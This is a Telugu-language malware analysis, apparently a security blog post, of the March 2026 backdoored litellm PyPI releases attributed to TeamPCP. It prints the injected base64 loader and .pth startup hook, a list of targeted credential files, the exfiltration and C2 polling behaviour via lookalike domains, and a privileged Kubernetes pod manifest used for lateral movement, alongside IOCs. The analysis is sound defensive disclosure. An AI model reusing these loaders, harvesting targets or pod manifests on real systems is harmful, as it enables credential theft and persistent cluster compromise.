లైట్‌ఎల్‌ఎల్‌ఎం సరఫరా గొలుసు దాడి

లైట్‌ఎల్‌ఎల్‌ఎమ్ సరఫరా గొలుసు దాడి: టీమ్‌పీసీపీ ఏఐ మౌలిక సదుపాయాలలోకి బ్యాక్‌డోర్ ఎలా చేసింది

విషయ సూచిక

తప్పక చదవాల్సిన పోస్ట్‌లు

ఆసక్తికరమైన తాజా పోస్ట్‌లు

వై దిస్ మ్యాటర్స్

మార్చి 24, 2026న, ప్రముఖ పైథాన్ ప్యాకేజీ లిటెల్మ్వేలాది మంది ఉపయోగించే ఒక సార్వత్రిక LLM ప్రాక్సీ గేట్‌వే enterpriseOpenAI, Anthropic, Google, మరియు AWS Bedrock వంటి AI ప్రొవైడర్లు మరియు అప్లికేషన్ల మధ్య ట్రాఫిక్‌ను మళ్లించడానికి ఉపయోగించే ఒక ప్లగిన్, PyPIలో నిశ్శబ్దంగా హ్యాక్ చేయబడింది. క్రెడెన్షియల్స్‌ను దొంగిలించి, క్లౌడ్ సీక్రెట్స్‌ను బయటకు పంపి, Kubernetes క్లస్టర్‌లలో అడ్డంగా వ్యాపించి, మరియు రిమోట్ కోడ్ ఎగ్జిక్యూషన్ సామర్థ్యాలతో ఒక శాశ్వత బ్యాక్‌డోర్‌ను ఇన్‌స్టాల్ చేసే బహుళ-దశల పేలోడ్‌ను కలిగి ఉన్న రెండు హానికరమైన వెర్షన్‌లు (1.82.7 మరియు 1.82.8) ఒకదాని తర్వాత ఒకటి 13 నిమిషాల వ్యవధిలో ప్రచురించబడ్డాయి.

సుమారుగా రోజువారీ 3.6 మిలియన్ల డౌన్‌లోడ్‌లు మరియు క్లౌడ్-నేటివ్ AI మౌలిక సదుపాయాలలో లోతైన విస్తరణతో, ఆధునిక దాడిదారులు ఆశించే అన్నింటి కూడలిలో లిటెల్మ్ ఉంది: ప్రతి ప్రధాన AI ప్రొవైడర్ కోసం API కీలు, క్లౌడ్ IAM ఆధారాలు, కుబెర్నెటెస్ సీక్రెట్‌లు మరియు SSH కీలు.

కానీ లిటెల్లమ్ రాజీ అనేది ఒక ఏకాంత సంఘటన కాదు. అది ఒక పరిణామం యొక్క పరాకాష్ట. ఐదు రోజుల, ఐదు పర్యావరణ వ్యవస్థల ప్రచారం ఒక ముప్పు కలిగించే వ్యక్తి ద్వారా టీమ్‌పీసీపీమొదట సెక్యూరిటీ స్కానర్‌లను (ఆక్వా ట్రివీ, చెక్‌మార్క్స్ KICS) విషపూరితం చేసి, ఆపై దొంగిలించబడిన వాటిని ఉపయోగించిన ప్రచారం. CI/CD npm, OpenVSX, మరియు చివరకు PyPI లలోకి వ్యాపించడానికి ఆధారాలు. సంస్థలు తమ సరఫరా గొలుసులను రక్షించుకోవడానికి ఆధారపడే సాధనాలనే దాడిదారులు ఆయుధాలుగా మార్చారు.

ఈ దాడి సరఫరా గొలుసు ముప్పు సంక్లిష్టతలో ఒక కీలకమైన మార్పును సూచిస్తుంది. అధిక విలువను చేరుకోవడానికి భద్రతా సాధనాలను దెబ్బతీసే బహుళ-దశల, క్రాస్-ఎకోసిస్టమ్ రూపకల్పన ఇందులో భాగంగా ఉంది. AI మౌలిక సదుపాయాలు, ఇది, రోజురోజుకు సర్వసాధారణం అవుతున్న దాడి సాధనాలకు అనుగుణంగా ఉండే ప్రణాళిక మరియు కార్యాచరణ పరిపక్వత స్థాయిని ప్రతిబింబిస్తుంది. పేలోడ్‌లను నిజ సమయంలో పునరావృతం చేశారు (సోర్స్ కోడ్‌లో మూడు పేలోడ్ వేరియంట్లు కనిపిస్తాయి, వీటిలో వ్యాఖ్యానించబడిన మునుపటి వెర్షన్‌లు కూడా ఉన్నాయి), దాడికి ఒక రోజు ముందు C2 ఇన్‌ఫ్రాస్ట్రక్చర్‌ను నమోదు చేశారు, మరియు చట్టబద్ధమైన వెండర్ ఇన్‌ఫ్రాస్ట్రక్చర్‌ను అనుకరించడానికి ఎక్స్‌ఫిల్ట్రేషన్ డొమైన్‌లను జాగ్రత్తగా ఎంచుకున్నారు. కార్డానో సైనింగ్ కీలు మరియు వైర్‌గార్డ్ కాన్ఫిగ్‌ల వంటి ప్రత్యేక లక్ష్యాలతో సహా 15కు పైగా వర్గాలను కవర్ చేసే ఈ క్రమబద్ధమైన, సమగ్రమైన క్రెడెన్షియల్ హార్వెస్టర్, AI-సహాయక మాల్వేర్ అభివృద్ధి ఒక శక్తి గుణకంగా పనిచేస్తుందనే విషయాన్ని సూచించేంతటి సంపూర్ణతను తెలియజేస్తుంది.

కాలక్రమం

తేదీ (UTC) ఈవెంట్
మార్చి 19 TeamPCP, Aqua Trivy GitHub Action ట్యాగ్‌లను దెబ్బతీసి, వాటి స్థానంలో హానికరమైన కోడ్‌ను చొప్పించి, సమాచారాన్ని బయటకు పంపిస్తుంది. CI/CD దిగువ రిపోజిటరీల నుండి రహస్యాలు
మార్చి 21 ఇదే విధమైన పద్ధతులను ఉపయోగించి కాంప్రమైజ్ చెక్‌మార్క్స్ KICS మరియు AST గిట్‌హబ్ యాక్షన్‌లకు కూడా విస్తరిస్తుంది.
మార్చి 22, 06:35 BerriAI నార్మల్ ద్వారా litellm 1.82.6 (చివరి క్లీన్ వెర్షన్)ని ప్రచురిస్తుంది CI/CD pipeline భద్రతా స్కానింగ్ కోసం ట్రివీని ఉపయోగించేది
మార్చి 23 TeamPCP models.litellm.cloud (ఎక్స్‌ఫిల్ట్రేషన్ డొమైన్)ను నమోదు చేస్తుంది. ఇది 66కు పైగా npm ప్యాకేజీలు మరియు OpenVSX ఎక్స్‌టెన్షన్‌లను రాజీ చేస్తుంది.
మార్చి 24, 10:39 litellm 1.82.7 PyPI లో ప్రచురించబడింది -- పేలోడ్ దీనిలోకి ఇంజెక్ట్ చేయబడింది proxy_server.py మాడ్యూల్ పరిధిలో. దిగుమతిపై అమలు అవుతుంది
మార్చి 24, 10:52 litellm 1.82.8 13 నిమిషాల తర్వాత ప్రచురించబడింది -- జతచేస్తుంది litellm_init.pthఇది litellm ఇంపోర్ట్‌లకు మాత్రమే కాకుండా, ప్రతి పైథాన్ ఇంటర్‌ప్రెటర్ ప్రారంభంలోనూ అమలు అయ్యే ఒక పైథాన్ పాత్ కాన్ఫిగరేషన్ హుక్. ఇది వేగవంతమైన పేలోడ్ పునరావృతాన్ని చూపుతుంది.
మార్చి 24, ~16:00 కమ్యూనిటీ నివేదికల తర్వాత PyPI రెండు వెర్షన్‌లను తొలగిస్తుంది. వెర్షన్‌లు ఇండెక్స్ నుండి పూర్తిగా తొలగించబడతాయి (యాంక్ చేయబడవు), అయినప్పటికీ CDN టార్‌బాల్‌లు అందుబాటులో ఉంటాయి.

బహిర్గతమయ్యే సమయం: సుమారు 5.5 గంటలు. ఈ సమయంలో, ఏదైనా pip install litellm, pip install --upgrade litellm, లేదా CI/CD pipeline తాజా వెర్షన్‌ను డౌన్‌లోడ్ చేసి ఉంటే పేలోడ్ అమలు చేయబడి ఉండేది.

మాల్వేర్ ఎలా ప్రవేశించింది: క్యాస్కేడింగ్ కాంప్రమైజ్

litellm ప్యాకేజీ నేరుగా హ్యాక్ చేయబడలేదు. దాడి చేసిన వ్యక్తి ఒక మార్గం ద్వారా దానిని చేరుకున్నాడు. రెండు-దశల సరఫరా గొలుసు దాడి:

Aqua Trivy GitHub Action (compromised March 19)     --> LiteLLM CI/CD pipeline runs Trivy without pinned version         --> Malicious Trivy exfiltrates PYPI_PUBLISH token from GitHub Actions runner             --> Attacker publishes poisoned litellm 1.82.7 and 1.82.8 directly to PyPI

లైట్ఎల్ఎల్ఎమ్స్ CI/CD pipeline ట్రివీని సెక్యూరిటీ స్కానర్‌గా ఉపయోగించారు — బలహీనతలను పట్టుకోవడానికి రూపొందించిన అదే సాధనం దాడికి మార్గంగా మారింది. ఎందుకంటే pipeline పిన్ చేయబడిన ట్యాగ్‌కు బదులుగా మార్చగల ట్యాగ్ ద్వారా ట్రివీని సూచించారు commit SHA, రాజీపడిన చర్య స్వయంచాలకంగా అమలు చేయబడింది. హానికరమైన ట్రివీ చర్య, పర్యావరణ రహస్యాలను బయటకు పంపింది, వాటిలో ఇవి ఉన్నాయి PYPI_PUBLISH litellm PyPI ప్రాజెక్ట్‌కు TeamPCPకి ప్రత్యక్ష ప్రచురణ యాక్సెస్‌ను ఇచ్చే టోకెన్.

ఈ “రక్షణ వ్యవస్థలను దెబ్బతీయడం” వ్యూహం TeamPCP ప్రచారానికి ఒక ముఖ్య లక్షణం. మొదట భద్రతా సాధనాలను (ట్రివీ, చెక్‌మార్క్స్ KICS) లక్ష్యంగా చేసుకోవడం ద్వారా, దాడి చేసేవారు ఏకకాలంలో గుర్తింపును నిలిపివేసి, తదుపరి సరఫరా గొలుసులకు ప్రత్యేక అధికార ప్రాప్యతను పొందారు.

సాంకేతిక విశ్లేషణ: పేలోడ్

ఇంజెక్షన్ పాయింట్లు

వెర్షన్ 1.82.7 — మాడ్యూల్-స్థాయి అమలు litellm/proxy/proxy_server.py (లైన్ 128):

import subprocess, base64, sys, tempfile, os  b64_payload = "<~12KB base64 blob>"  with tempfile.TemporaryDirectory() as d:     p = os.path.join(d, "p.py")     with open(p, "wb") as f:         f.write(base64.b64decode(b64_payload))     subprocess.run([sys.executable, p])

ఈ కోడ్ ఒక డిక్షనరీ లిటరల్ మరియు అసలైన దాని మధ్య మాడ్యూల్ స్కోప్‌లో ఉంటుంది. showwarning() ఫంక్షన్. ఇది వెంటనే అమలు అవుతుంది litellm.proxy.proxy_server litellm యొక్క ప్రాక్సీ ఫంక్షనాలిటీని ఉపయోగించిన ప్రతిసారీ ఇది జరుగుతుంది, దిగుమతి చేయబడుతుంది.

వెర్షన్ 1.82.8 జోడించబడింది litellm_init.pth (పైథాన్ పాత్ కాన్ఫిగరేషన్ ఫైల్):

import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"], ...) 

పైథాన్ .pth ఫైల్లు site-packages/ ప్రతి ఇంటర్‌ప్రెటర్ ప్రారంభంలో ప్రాసెస్ చేయబడతాయి, కానీ దీనితో ప్రారంభమయ్యే పంక్తులు మాత్రమే import కోడ్‌గా అమలు చేయబడతాయి. దాడి చేసేవాడు మొత్తం పేలోడ్‌ను ఒకేదానికి అనుసంధానించడం ద్వారా దీనిని ఉపయోగించుకుంటాడు. import ప్రకటన: import os, subprocess, sys; subprocess.Popen(...)ఇది proxy_server.py ఇంజెక్షన్ కంటే చాలా తీవ్రమైనది — litellm ఎప్పుడూ ఇంపోర్ట్ చేయకపోయినా కూడా, ప్రతి పైథాన్ ప్రాసెస్ ప్రారంభంలో ఇది ట్రిగ్గర్ అవుతుంది. pyproject.toml పంపిణీలో ఈ ఫైల్‌ను చేర్చడానికి సవరించబడింది:

include = [     { path = "litellm_init.pth", format = ["sdist", "wheel"] } ]

వెర్షన్ 1.82.8 ఈ విధంగా కలిగి ఉంది రెండు స్వతంత్ర అమలు మార్గాలు: proxy_server.py ఇంజెక్షన్ (litellm ప్రాక్సీ ఇంపోర్ట్‌పై ట్రిగ్గర్ అవుతుంది) మరియు .pth ఫైల్ (ఏదైనా పైథాన్ స్టార్టప్‌లో ట్రిగ్గర్ అవుతుంది). ఈ పునరావృతం అనేది గమనించదగ్గ విషయం — ఇది ఈ రెండు మార్గాలలో దేనినైనా విడిగా గుర్తించడం లేదా తొలగించడం నుండి రక్షణ కల్పిస్తుంది. 1.82.7 వెర్షన్ వచ్చిన కేవలం 13 నిమిషాల తర్వాత, ఇంపోర్ట్ సమయం నుండి స్టార్టప్ సమయానికి ఈ దాడి తీవ్రతరం కావడం, దాడి చేసిన వ్యక్తి డిప్లాయ్‌మెంట్ విజయాన్ని పర్యవేక్షిస్తూ, వేగంగా మార్పులు చేస్తున్నాడని సూచిస్తుంది.

దశ 1: సమగ్ర ధృవీకరణ పత్రాల సేకరణ

డీకోడ్ చేయబడిన అంతర్గత స్క్రిప్ట్ ఒక క్షుణ్ణమైన క్రెడెన్షియల్ శూన్యం. ఇది ఉపయోగిస్తుంది os.walk()glob.glob()subprocess.check_output()మరియు మొత్తం సిస్టమ్‌ను శోధించడానికి డైరెక్ట్ ఫైల్ రీడ్‌లు:

వర్గం టార్గెట్స్
సిస్టమ్ రీకాన్ hostname, whoami, uname -a, ip addr, printenv, ip route
SSH ~/.ssh/id_rsa, id_ed25519, id_ecdsa, authorized_keys, known_hosts, configహోస్ట్ కీలు నుండి /etc/ssh/
క్లౌడ్ (AWS) ~/.aws/credentials, ~/.aws/configIMDS పాత్ర ఆధారాలు ద్వారా 169.254.169.254రహస్యాల నిర్వాహకుడు ListSecretsఎస్ఎస్ఎం DescribeParameters
క్లౌడ్ (GCP) ~/.config/gcloud/ (పునరావృతమయ్యే); $GOOGLE_APPLICATION_CREDENTIALS
క్లౌడ్ (అజూర్) ~/.azure/ (పునరావృత); పర్యావరణ వేరియబుల్స్
Kubernetes సేవా ఖాతా టోకెన్లు; ca.crt; నేమ్‌స్పేస్; kubectl get secrets --all-namespacesK8s API ద్వారా అన్ని రహస్యాలు
పర్యావరణ ఫైళ్లు .env, .env.local, .env.production, .env.development, .env.staging — అంతటా పునరావృత శోధన (లోతు 6) /home, /root, /opt, /srv, /var/www, /app, /data, /tmp
డాకర్ ~/.docker/config.json, /kaniko/.docker/config.json
ప్యాకేజీ టోకెన్లు ~/.npmrc, ~/.vault-token, ~/.netrc
డేటాబేస్లు ~/.pgpass, ~/.my.cnf, /etc/mysql/my.cnf, /etc/redis/redis.conf, మోంగోడిబి కాన్ఫిగరేషన్లు
TLS / SSL నుండి ప్రైవేట్ కీలు /etc/ssl/private/, లెట్స్ ఎన్‌క్రిప్ట్ సర్టిఫికెట్లు, అన్నీ .pem/.key/.p12/.pfx ఫైళ్లు
Git ~/.git-credentials, ~/.gitconfig
CI/CD terraform.tfvars, terraform.tfstate, .gitlab-ci.yml, Jenkinsfile, ansible.cfg
క్రిప్టో వాలెట్లు బిట్‌కాయిన్, ఎథేరియం కీస్టోర్, సోలానా కీపెయిర్‌లు (వాలిడేటర్, ఓట్, స్టేక్, ఫాసెట్), కార్డానో సైనింగ్ కీలు, లైట్‌కాయిన్, డాగ్‌కాయిన్, జెడ్‌క్యాష్, డాష్, రిపుల్, మొనెరో
షెల్ చరిత్ర .bash_history, .zsh_history, .mysql_history, .psql_history, .rediscli_history
సిస్టమ్ ప్రామాణీకరణ /etc/passwd, /etc/shadow, ప్రామాణీకరణ లాగ్‌లు (ఆమోదించబడిన SSH సెషన్‌లు)
వెబ్‌హుక్/API కీలు స్లాక్ వెబ్ కోసం గ్రెప్hooksడిస్కార్డ్ వెబ్hooks, కాన్ఫిగ్ ఫైల్స్‌లో API కీలు/సీక్రెట్‌లు
VPN WireGuard కాన్ఫిగరేషన్‌లు /etc/wireguard/

ఈ హార్వెస్టర్ యొక్క పరిధి సర్వవిజ్ఞాన సర్వస్వం లాంటిది. ఇది కేవలం క్లౌడ్ క్రెడెన్షియల్స్‌నే కాకుండా, క్రిప్టోకరెన్సీ వాలెట్‌లు, డేటాబేస్ పాస్‌వర్డ్‌లు, VPN కాన్ఫిగరేషన్‌లు మరియు మరెన్నో వాటిని లక్ష్యంగా చేసుకుంటుంది. CI/CD రహస్యాలు — దాడి చేసేవాడు రాజీపడిన సిస్టమ్‌ల నుండి బహుళ మార్గాల ద్వారా డబ్బు సంపాదించాలని భావిస్తున్నట్లు సూచిస్తున్నాయి.

స్టేజ్ 2: ఎన్‌క్రిప్టెడ్ ఎక్స్‌ఫిల్ట్రేషన్

దొంగిలించబడిన డేటా హైబ్రిడ్ ఎన్‌క్రిప్షన్ స్కీమ్‌ను ఉపయోగించి ఎన్‌క్రిప్ట్ చేయబడి, బయటకు పంపబడుతుంది:

  • AES-256-CBC యాదృచ్ఛిక 32-బైట్ సెషన్ కీతో సేకరించిన మొత్తం డేటాను ఎన్కోడ్ చేయడం (ద్వారా openssl enc)
  • RSA-4096 దాడి చేసేవారి ఎంబెడెడ్ పబ్లిక్ కీని ఉపయోగించి సెషన్ కీని ఎన్క్రిప్ట్ చేయడం (OAEP ప్యాడింగ్, ద్వారా openssl pkeyutl)
  • రెండు సైఫర్‌టెక్స్ట్ ఫైల్‌లు ఈ విధంగా బండిల్ చేయబడ్డాయి tpcp.tar.gz (ది tpcp ప్రచారమంతటా స్థిరంగా కనిపించే — “TeamPCP” అనే ఉపసర్గ)
  • HTTPS POST కు https://models.litellm.cloud/ తో Content-Type: application/octet-stream

డొమైన్ models.litellm.cloud దాడికి ఒక రోజు ముందు, మార్చి 23న ఇది నమోదు చేయబడింది మరియు చట్టబద్ధమైన లిటెల్లమ్ మౌలిక సదుపాయాలతో కలిసిపోయేలా రూపొందించబడింది (అసలు ప్రాజెక్ట్ ఉపయోగిస్తుంది litellm.aiఎగ్రెస్‌ ట్రాఫిక్‌ను సమీక్షించే నెట్‌వర్క్‌-అవేర్‌ డిఫెండర్ కూడా, లిటెల్మ్ యొక్క సొంత మోడల్ ఎండ్‌పాయింట్‌గా కనిపించే దానికి వెళ్లే ట్రాఫిక్‌ను ఫ్లాగ్‌ చేయకపోవచ్చు.

దశ 3: శాశ్వత బ్యాక్‌డోర్ (sysmon.py)

పేలోడ్ సిస్టమ్ టెలిమెట్రీగా మారువేషంలో ఉన్న పోలింగ్ బ్యాక్‌డోర్‌ను ఇన్‌స్టాల్ చేస్తుంది:

  • మార్గం~/.config/sysmon/sysmon.py
  • సర్వీస్sysmon.service (systemd యూజర్ యూనిట్, “సిస్టమ్ టెలిమెట్రీ సర్వీస్”గా వర్ణించబడింది)
  • ప్రవర్తనప్రారంభ 300-సెకన్ల నిద్ర తర్వాత, పోల్స్ https://checkmarx.zone/raw ప్రతి ~50 నిమిషాలకు
  • అమలుC2 ద్వారా తిరిగి ఇవ్వబడిన URLను డౌన్‌లోడ్ చేస్తుంది /tmp/pglog, దానిని ఎగ్జిక్యూటబుల్‌గా సెట్ చేస్తుంది (chmod 755), డిటాచ్డ్ సెషన్‌లో దీన్ని నడుపుతుంది
  • రాష్ట్ర ట్రాకింగ్/tmp/.pg_state అదే పేలోడ్‌ను మళ్లీ డౌన్‌లోడ్ చేయడాన్ని నివారిస్తుంది
  • పట్టుదలRestart=alwaysRestartSec=10 క్రాష్‌లు మరియు రీబూట్‌లను తట్టుకుంటుంది

డొమైన్ checkmarx.zone ఇది చెక్‌మార్క్స్ (ఒక సెక్యూరిటీ కంపెనీ వద్ద) యొక్క టైపోస్క్వాట్. checkmarx.com), నెట్‌వర్క్ లాగ్‌లను సమీక్షించే SOC విశ్లేషకులు, చట్టబద్ధమైన భద్రతా విక్రేతగా కనిపించే దానికి ట్రాఫిక్‌ను చూసేలా ఇది రూపొందించబడింది. భద్రతా విక్రేత బ్రాండింగ్ వెనుక దాక్కోవాలనే TeamPCP యొక్క విస్తృత వ్యూహానికి అనుగుణంగా ఇది ఒక ఉద్దేశపూర్వక తప్పించుకునే పద్ధతి.

దశ 3బి: కుబెర్నెటెస్ పార్శ్వ కదలిక

హ్యాక్ చేయబడిన సిస్టమ్‌లో కుబెర్నెటెస్ సర్వీస్ అకౌంట్ ఆధారాలు ఉంటే, మాల్వేర్ అన్ని క్లస్టర్ నోడ్‌లను జాబితా చేసి, డిప్లాయ్ చేస్తుంది. ప్రత్యేక హక్కులు గల పాడ్‌లు ప్రతి ఒక్కరికి:

pod_manifest = {     'apiVersion': 'v1', 'kind': 'Pod',     'metadata': {'name': f'node-setup-{node_name[:35]}', 'namespace': 'kube-system'},     'spec': {         'nodeName': node_name,         'hostPID': True, 'hostNetwork': True,         'tolerations': [{'operator': 'Exists'}],         'containers': [{             'name': 'setup',             'image': 'alpine:latest',             'command': ['sh', '-c', drop_cmd],             'securityContext': {'privileged': True},             'volumeMounts': [{'name': 'host', 'mountPath': '/host'}]         }],         'volumes': [{'name': 'host', 'hostPath': {'path': '/'}}],         'restartPolicy': 'Never'     } }

ప్రతి పాడ్:

  • ఇలా నడుస్తుంది విశేషాధికారం తో hostPIDhostNetworkమరియు పూర్తి హోస్ట్ ఫైల్ సిస్టమ్ యాక్సెస్
  • ఉపయోగాలు chroot /host అదే ఇన్‌స్టాల్ చేయడానికి sysmon.py హోస్ట్ యొక్క రూట్ ఫైల్ సిస్టమ్‌లో బ్యాక్‌డోర్
  • దీనిని ఒక systemd సేవగా నమోదు చేస్తుంది, తద్వారా పాడ్ తొలగింపు తర్వాత కూడా దాని నిలకడ కొనసాగుతుంది.
  • అనే node-setup-* లో kube-system చట్టబద్ధమైన క్లస్టర్ మౌలిక సదుపాయాలుగా కనిపించడానికి నేమ్‌స్పేస్

దీని అర్థం ఒంటరి రాజీపడిన CI/CD K8s యాక్సెస్ ఉన్న రన్నర్ వల్ల క్లస్టర్‌లోని ప్రతి నోడ్‌లోనూ బ్యాక్‌డోర్ ఉండే అవకాశం ఉంది. కుబెర్నెటిస్‌లో లైటెల్మ్‌ను ప్రాక్సీగా నడుపుతున్న సంస్థలకు ఇది ఒక విపత్కరమైన లాటరల్ మూవ్‌మెంట్ దృశ్యం.

పేలోడ్ పరిణామం (వ్యాఖ్యానించబడిన వేరియంట్లు)

131-132 పంక్తులలోని సోర్స్ కోడ్‌లో, వ్యాఖ్యానించబడిన (commented-out) రెండు మునుపటి పేలోడ్ వేరియంట్‌లు ఉన్నాయి, ఇవి దాడి చేసేవారి అభివృద్ధి ప్రక్రియను వెల్లడిస్తున్నాయి:

  • మూడు వేరియంట్లు ఒకే బహిర్గత మౌలిక సదుపాయాలను పంచుకోండి (models.litellm.cloud), RSA-4096 పబ్లిక్ కీ, AES-256-CBC + RSA హైబ్రిడ్ ఎన్‌క్రిప్షన్ వ్రాపర్, మరియు tpcp.tar.gz బండిల్ నామకరణం
  • మునుపటి రకాలు ఒక RC4 ఎన్‌క్రిప్షన్ పొర డేటా సేకరణ స్క్రిప్ట్ లోపల, బయటి AES+RSA వ్రాపర్‌కు ముందు సేకరించిన డేటాను ఎన్‌క్రిప్ట్ చేయడం జరుగుతుంది. ఈ లోపలి RC4 లేయర్‌ను తొలగించడం ద్వారా యాక్టివ్ పేలోడ్ (లైన్ 130) సరళీకరించబడింది.
  • మునుపటి రకాలు ఉపయోగం exec() తో StringIO యాక్టివ్ పేలోడ్ ఉపయోగిస్తున్నప్పుడు, కలెక్టర్‌ను ఇన్-ప్రాసెస్‌లో అమలు చేయడానికి క్యాప్చర్ చేయండి subprocess.run() stdout రీడైరెక్ట్‌తో — హోస్ట్ ప్రాసెస్‌ను కలుషితం చేయకుండా ఉండే ఒక శుభ్రమైన విభజన
  • ఈ మూడు వేరియంట్‌లు ఒకే క్రెడెన్షియల్ కేటగిరీలను మరియు సేకరణ మార్గాలను లక్ష్యంగా చేసుకుంటాయి.
  • మునుపటి వెర్షన్‌లలోని RC4 కీ అనేది, టెలిగ్రామ్‌లో ఆ వ్యక్తి దృష్టిని ఆకర్షించే ప్రవర్తనకు అనుగుణంగా, రెచ్చగొట్టే దూషణగా ఉండేది.

ఇది ఆపరేషన్ సమయంలో చురుకైన అభివృద్ధి జరుగుతోందని వెల్లడిస్తుంది. దాడి చేసిన వ్యక్తి సేకరణ లక్ష్యాలను మరియు సమాచార బహిష్కరణ మౌలిక సదుపాయాలను స్థిరంగా ఉంచుతూనే, ఎన్‌క్రిప్షన్ స్టాక్‌ను సరళీకరించి, ఎగ్జిక్యూషన్ ఐసోలేషన్‌ను మెరుగుపరిచాడు.

రాజీ సూచికలు (IOCలు)

నెట్వర్క్

సూచిక రకం పర్పస్
models.litellm.cloud డొమైన్ ఎక్స్‌ఫిల్ట్రేషన్ ఎండ్ పాయింట్ (HTTPS POST)
checkmarx.zone డొమైన్ C2 పోలింగ్ ఎండ్‌పాయింట్ (HTTPS GET) /raw)

గమనిక: బాహ్య రిపోర్టింగ్ లింకులు checkmarx.zone/static/checkmarx-util-1.0.4.tgz TeamPCP క్యాంపెయిన్ యొక్క మునుపటి KICS దశకు. ఇక్కడ విశ్లేషించబడిన litellm పేలోడ్‌లలో ఈ URL కనుగొనబడలేదు.

ప్యాకేజీ హాష్‌లు

ఫైలు SHA256
litellm-1.82.7.tar.gz 8a2a05fd8bdc329c8a86d2d08229d167500c01ecad06e40477c49fb0096efdea
litellm-1.82.8.tar.gz d39f4e7a218053cce976c91eacf184cf09a6960c731cc9d66d8e1a53406593a5

ఫైల్ సిస్టమ్

సూచిక రకం పర్పస్
~/.config/sysmon/sysmon.py ఫైలు నిరంతర బ్యాక్‌డోర్ స్క్రిప్ట్
~/.config/systemd/user/sysmon.service ఫైలు సిస్టమ్‌డి పర్సిస్టెన్స్ యూనిట్
/tmp/pglog ఫైలు రెండవ దశ బైనరీ డౌన్‌లోడ్ చేయబడింది
/tmp/.pg_state ఫైలు C2 స్టేట్ ట్రాకింగ్
litellm_init.pth in site-packages/ ఫైలు పైథాన్ స్టార్టప్ హుక్ (v1.82.8 మాత్రమే)
tpcp.tar.gz ఫైలు ఎన్‌క్రిప్టెడ్ ఎక్స్‌ఫిల్ట్రేషన్ బండిల్

Kubernetes

సూచిక రకం పర్పస్
node-setup-* పాడ్స్ లో kube-system పోడియమ్ ప్రత్యేక పార్శ్వ కదలిక పాడ్‌లు
sysmon.service క్లస్టర్ నోడ్‌లపై సర్వీస్ పాడ్ ఎస్కేప్ ద్వారా హోస్ట్-స్థాయి నిలకడ

క్రిప్టోగ్రాఫిక్

సూచిక వివరాలు
దాడి చేసినవారి RSA-4096 పబ్లిక్ కీ SHA256 ఫింగర్‌ప్రింట్: bc40e5e2c438032bac4dec2ad61eedd4e7c162a8b42004774f6e4330d8137ba8మూడు పేలోడ్ వేరియంట్‌లలోనూ పొందుపరచబడింది; ఇతర TeamPCP ఆపరేషన్‌లలో కూడా ఇదే కీ నివేదించబడింది.
tpcp కళాఖండాలలో ఉపసర్గ బండిల్ నామకరణ విధానం (tpcp.tar.gzప్రచారం అంతటా స్థిరంగా

సౌజన్యం: టీమ్‌పీసీపీ

ఈ ప్రచారం వెనుక ఉన్న ముప్పు కారకుడిని ఈ విధంగా ట్రాక్ చేస్తున్నారు టీమ్‌పీసీపీదీనిని PCPcat, Persy_PCP, ShellForce, మరియు DeadCatx3 అని కూడా పిలుస్తారు.

తెలిసిన లక్షణాలు:

  • టెలిగ్రామ్ ఛానెల్‌లను నిర్వహిస్తుంది @Persy_PCP మరియు @teampcp అక్కడ వారు భద్రతా సంస్థలను ఎగతాళి చేశారు
  • బహుళ ఎకోసిస్టమ్‌లలో పనిచేస్తుంది (GitHub Actions, PyPI, npm, OpenVSX)
  • ప్రచారంలోని ప్రతి దశకు విక్రేత-నిర్దిష్ట టైపోస్క్వాట్ డొమైన్‌లను ఉపయోగిస్తుంది (ఉదా, checkmarx.zone చెక్‌మార్క్స్ కోసం, models.litellm.cloud లిటెల్మ్ కోసం)
  • స్థిరమైన మౌలిక సదుపాయాల గుర్తులు: ఒకే RSA కీ జత, tpcp.tar.gz నామకరణ సంప్రదాయం, tpcp-docs-* డెడ్-డ్రాప్ స్టేజింగ్‌గా ఉపయోగించబడే గిట్‌హబ్ రిపోజిటరీలు
  • భద్రతా సాధనాలను దిగువ సరఫరా గొలుసులకు ప్రవేశ మార్గాలుగా లక్ష్యంగా చేసుకుంటుంది

ఆపాదిత విశ్వాసంఅధికం. భాగస్వామ్య RSA పబ్లిక్ కీ, tpcp ఐదు రోజుల ప్రచారంలో ఆర్టిఫ్యాక్ట్ నామకరణం, C2 మౌలిక సదుపాయాల అతివ్యాప్తి, మరియు కార్యాచరణ వేగం అనేవి ట్రివీ, KICS, npm, OpenVSX, మరియు litellm రాజీలను ఒకే కారకుడికి బలంగా ముడిపెడుతున్నాయి.

ప్రేరణ: బహుశా ఆర్థిక (క్రిప్టో వాలెట్ దొంగతనం, క్లౌడ్ క్రెడెన్షియల్ మానిటైజేషన్) మరియు అపఖ్యాతి (టెలిగ్రామ్‌లో ఎగతాళి చేయడం) కలయిక కావచ్చు. AWS IAM నుండి సోలానా వాలిడేటర్ కీపెయిర్‌ల వరకు, వైర్‌గార్డ్ కాన్ఫిగ్‌ల వరకు క్రెడెన్షియల్ హార్వెస్టింగ్ యొక్క విస్తృతి, ప్రతి రాజీ నుండి ROIని గరిష్ఠంగా పెంచుకోవాలని చూస్తున్న ఆర్థిక ప్రేరణ కలిగిన వ్యక్తిని సూచిస్తుంది.

సాధ్యమయ్యే AI సహాయం: ఈ క్రెడెన్షియల్ హార్వెస్టర్, AI-సహాయక గణనకు అనుగుణంగా, క్రమబద్ధంగా సమగ్రంగా ఉంది — ఇందులో కార్డనో సైనింగ్ కీలు, వైర్‌గార్డ్ కాన్ఫిగ్‌లు, మరియు కనికో డాకర్ క్రెడెన్షియల్స్ వంటి ప్రత్యేక లక్ష్యాలతో సహా 15కు పైగా కేటగిరీలు ఉన్నాయి. పేలోడ్ పునరావృత వేగం (విభిన్న ఎన్‌క్రిప్షన్ స్కీమ్‌లతో మూడు వేరియంట్లు), క్రాస్-ఎకోసిస్టమ్ సమన్వయం (5 రోజుల్లో 5 ఎకోసిస్టమ్‌లు), మరియు ఆపరేషనల్ OPSEC (వెండర్-ఇంపర్సొనేటింగ్ డొమైన్‌లు, హైబ్రిడ్ ఎన్‌క్రిప్షన్, టెలిమెట్రీగా మారువేషంలో ఉన్న సిస్టమ్‌డి పర్సిస్టెన్స్) వంటివి, AI-సహాయక అభివృద్ధిని ఒక శక్తి గుణకంగా ప్రతిబింబించే స్థాయి థ్రూపుట్‌ను సూచిస్తున్నాయి. ఈ అంచనా ఊహాజనితమైనది; నైపుణ్యం కలిగిన ఆపరేటర్లు AI టూలింగ్ లేకుండా కూడా ఇలాంటి పరిధిని సాధించగలరు.

